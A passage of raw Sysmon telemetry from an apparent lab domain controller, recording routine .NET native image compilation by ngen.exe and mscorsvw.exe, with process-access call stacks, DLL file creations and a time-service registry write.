32\ntdll.dll+51791 10341000x80000000000000006709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.890{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9173-6005-8202-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.874{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9173-6005-8202-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.874{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9173-6005-8202-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:31.812{59A5CD1D-9173-6005-8102-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12fc-0\System.IdentityModel.Services.dll2021-01-18 13:47:31.812 13241300x80000000000000006705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:47:31.609{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0x77e59401) 10341000x80000000000000006704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.312{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9173-6005-8102-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:31.281{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9173-6005-8102-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.281{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9173-6005-8102-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:32.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8802-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.734{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8802-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:32.734{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8802-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:32.671{59A5CD1D-9174-6005-8702-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d78-0\System.IO.Log.dll2021-01-18 13:47:32.671 10341000x80000000000000006726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:32.343{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8702-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.343{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8702-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:32.343{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8702-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8602-00000000A301}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.281{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8602-00000000A301}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.281{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8602-00000000A301}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:32.218{59A5CD1D-9174-6005-8502-00000000A301}3528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\dc8-0\System.IO.Compression.FileSystem.dll2021-01-18 13:47:32.218 10341000x80000000000000006719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8502-00000000A301}3528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.171{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8502-00000000A301}3528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:32.171{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8502-00000000A301}3528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8402-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.140{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8402-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.140{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8402-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:32.077{59A5CD1D-9173-6005-8302-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1140-0\System.IO.Compression.dll2021-01-18 13:47:32.077 10341000x80000000000000006743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9175-6005-8C02-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.609{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9175-6005-8C02-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:33.609{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9175-6005-8C02-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32